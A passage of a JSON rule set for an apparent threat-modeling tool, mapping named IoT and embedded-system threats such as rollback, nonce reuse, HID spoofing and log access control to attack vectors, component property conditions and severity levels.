boot","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"1487298b-ff88-4e01-9a60-09b1eaf8a41f","Name":"Missing immutable Root of Trust","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f170308a-c188-4ae0-bcef-d04af1e429b3","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"c54de80f-b548-4432-9ec0-fa3a579be7e6","Name":"Updatable","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"99864969-3b71-45ad-bae5-09bc4ecc5cc1","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"367b80cd-1b41-483b-a157-b143714b8af7","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"c6535534-7656-4819-93fe-19d9a78a9390","Name":"Roll-back","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c23a62c8-901a-412b-80b8-d2574103b733","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d951b792-f84b-4ab3-82d1-21867e202755","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"85b3711a-33d2-4cd2-9c84-471e76cc761c","Name":"Improper debug access control","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8a6476b9-7a5c-4306-bd43-db6fe32bbf66","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"12c8413b-e1cc-40d6-ae07-6321c5fbf4a0","Name":"Internal assets exposed","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1a99fb9b-d1f0-4215-93a6-5cd9fd272026","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"517b62dd-eea7-426e-82c6-2c458eed0aaf","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"5aac31c8-fcb7-4d27-8937-e2c9747b83d4","Name":"Address Region Overlap","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"24645edb-85ac-438b-9033-ba2721c3e2c7","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"6630ce3a-e21d-467a-b669-99418e95cd8a","Name":"State Transition","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5656f112-8443-4245-aa38-38cd9d9375e0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"16ab50f4-dd94-43dd-8480-37cae5c61043","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"6aec11cc-995c-4ee9-a1ce-506b071f3da3","Name":"Risky cryptographic algorithm ","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"31f89637-4b8a-41e9-acac-9d012767a424","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"2ee8ccf6-2886-4ebe-81d9-46a408b553a3","Name":"Less-secure downgrade","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97b5a1d4-be82-4485-82f6-e4532795a20b","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"f46ae96c-b62c-4fda-955d-6ed55c157c7f","Name":"Weak block cipher mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a20d6e53-4426-4700-a04f-a4018bc7bfce","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"518bbb50-aeee-4c87-95d1-8724a4dac569","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"dfac545d-b449-45d0-95bd-a7814b1a97ce","Name":"Appropriate parameters","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"08377961-8f56-4b56-b684-331f77810f1d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4e5318de-8259-41cd-8704-8842a959b9c6","Name":"Insufficient entropy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0ffd675d-d83c-4f74-8835-398e7f3930cb","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"420f03a2-1ab7-4bc2-910d-4ea025518da2","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a904d935-a9d7-45d9-83c8-c403a57e0b80","Name":"Nonce reuse","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"680ceebd-357c-49d6-8bfd-390dc6c51dde","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f35ccff8-6497-4b28-8627-7f255bce0e02","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"12caa9f9-0b1c-4ce0-ac2b-ebee69001b1e","Name":"HID spoofing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"195d942e-02f8-49ad-873f-299f4b4ad4ec","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"23564ce2-4786-4144-85b6-d03de2771d6b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"38d27f20-a7ee-40dc-aa6f-b10c98d72409","Name":"Malicious file","Description":"Social engineering: An USB flash drive contains interesting but malicious files","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf948333-b659-40ff-b93f-d4bdc8c980d1","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e884ecfe-bda1-4f0b-86f7-3ce0d735aeeb","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"8597431f-52e2-4d89-bb21-7d34185dbfe6","Name":"USB killer","Description":"Note: this type of attack is also possible at other interfaces such as HDMI, Thunderbolt, etc.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"915f674e-926b-4bd9-94cb-ee8b4637bc80","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[]},"Severity":3},{"ID":"b8438e31-cc77-4400-86c0-14aa01d411ae","Name":"Ethernet port scan","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f5949698-47d4-48ee-a116-2d212695c41f","ThreatCategoryIDs":[]},"overridenRuleIDs":["fa055483-b3a2-461f-b09c-46e99de0455e"],"RuleType":1,"StencilRestriction":{"stencilTypeID":"58e0c62c-e5b7-4e9f-9f8a-f8150cf18930","DetailRestrictions":[]},"Severity":1},{"ID":"fa055483-b3a2-461f-b09c-46e99de0455e","Name":"WiFi port scan","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f5949698-47d4-48ee-a116-2d212695c41f","ThreatCategoryIDs":[]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[]},"Severity":1},{"ID":"9ec88af2-3da9-41df-93bf-8cbcb74a7bb6","Name":"Protocol design issues","Description":"Custom protocols may be not sufficiently tested and therefore more likely include vulnerabilities","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":4,"StencilRestriction":{"stencilTypeID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","DetailRestrictions":[]},"ProtocolRestriction":{"protocolID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","DetailRestrictions":[]},"Severity":2},{"ID":"21c438f5-30d1-4cfc-9deb-78827b036a22","Name":"Actuator command injection","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","ThreatCategoryIDs":["88d19822-b1b0-469f-ae00-1bc600ccaa1d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"NewProperty3","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"8aa3a3b1-0aff-4e15-ad59-cc40b75dbdbd","Name":"Sensor data manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a76b8768-9d68-4074-b5e1-0f9abc61bcda","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":0,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"NewProperty1","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b41b621c-4b91-43f9-90ab-b7e955269620","Name":"Device theft","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"30cf5142-2339-4130-8a6e-2b05869e6df2","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e9148055-f813-45da-85a8-bfcf4d71ff40","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"08043f24-cc72-435b-ace1-bd593442215d","Name":"Unauthorized unplugging","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","7cf3480c-f4db-47cb-be36-b27deb746c64"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e75f9804-6ae3-4eb6-9011-4b87a0d4823b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cef5bbac-5833-49bb-9021-9f5200c29c83","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"e8848ea8-e120-4722-bc10-90daf7b4a075","Name":"Compliance loss duty cycle limit","Description":"For example Europe defines a maximum duty cycle","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["1180824d-9f8a-4a4a-8398-3775c541a360"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4edf4a31-e828-4933-9a87-779083e7167e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"0e783801-b482-4721-af49-1be96b16fc59","Name":"Communication outage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4edf4a31-e828-4933-9a87-779083e7167e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"512c6921-1b40-4e26-86b5-f66609e57d96","Name":"Data store theft","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"30cf5142-2339-4130-8a6e-2b05869e6df2","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsRemovable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8c29ed3b-b151-41de-81ae-627227aaa104","Name":"Selective forwarding","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":2,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[]},"Severity":2},{"ID":"6a9008d4-fa27-46b1-8a11-6dbcecb8b211","Name":"Human identification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["bcd08af5-29bf-4ed8-ab6c-e311e88f4c84"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"38883a00-d18f-4d1f-8a4c-18741a480557","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e5f4b790-5898-495d-9b51-5a16d452edff","Name":"Privacy-violating interaction","Description":"Gestures in public environments result in privacy-violating interaction","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["af3ee78e-9e83-4bd1-b9b5-13ec28765518"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d9919a71-0642-46a5-8056-348e06f8b86e","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8340469b-525d-4563-a75d-6ca1d60c7409","Name":"Hidden interfaces","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"184cd5e5-2517-4d7f-a81a-c411942d3601","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"311904f3-7898-4bab-ba74-e6024c704cd3","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"d714118d-123d-41b4-8997-63b13a5c09d4","Name":"Integrity validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8f47a4ac-0934-4a65-a6f3-07503c92f658","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"90c71cb6-ec32-4eb6-95ca-20a5d7381fc6","Name":"Authenticity validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"cb711ade-c26b-4500-8337-4eba00d26975","Name":"TOCTOU attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"000441ff-d15f-46c3-bb9c-0c949063271d","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"1729c2ac-4dd2-449a-bd8a-ee7c11ff1461","Name":"Unknown state","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3df6a845-52a2-40a9-8978-0277efd7cfcb","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b9caf305-7c53-48c9-beef-2fb2a96cc5b0","Name":"Regulation compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["1180824d-9f8a-4a4a-8398-3775c541a360"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4006de15-8767-4a09-8678-84b8d6b50ae0","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"778eb19f-8f36-4ce5-aa48-70429386b113","Name":"Improper log access control","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8e4b2af8-b023-4991-80f5-54ffa28cd616","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c4df07d3-101f-492e-9f90-70d916f7ed43","Name":"Missing log rotation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b274e8f6-5a0f-4efc-bc4e-40210c2035ad","Name":"Log file overwritten","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b0d13562-1629-4724-bb67-f910157ed1c9","Name":"Missing log evaluation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"b4c216c0-ccab-4a4d-a156-1b4979dc2aec","Name":"Missing separate location for log files","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"418fe90d-88fd-4066-9339-890501ea07f0","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c6ac1dcf-ff18-4810-ba64-10aaaf44c135","Name":"Missing central log backup","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"bd32d10e-82d6-4e7f-9247-fe2753908e60","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"f51350c5-5401-4276-a8e5-14eba86bc070","Name":"Log files contain passwords","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"71f761e4-8149-4a88-92fd-35f9d99cc0ef","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"025e828e-d1a0-4487-9c56-09fd6941d4b9","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e145ffad-ec47-4251-9fa4-1475133db2ff","Name":"Missing log 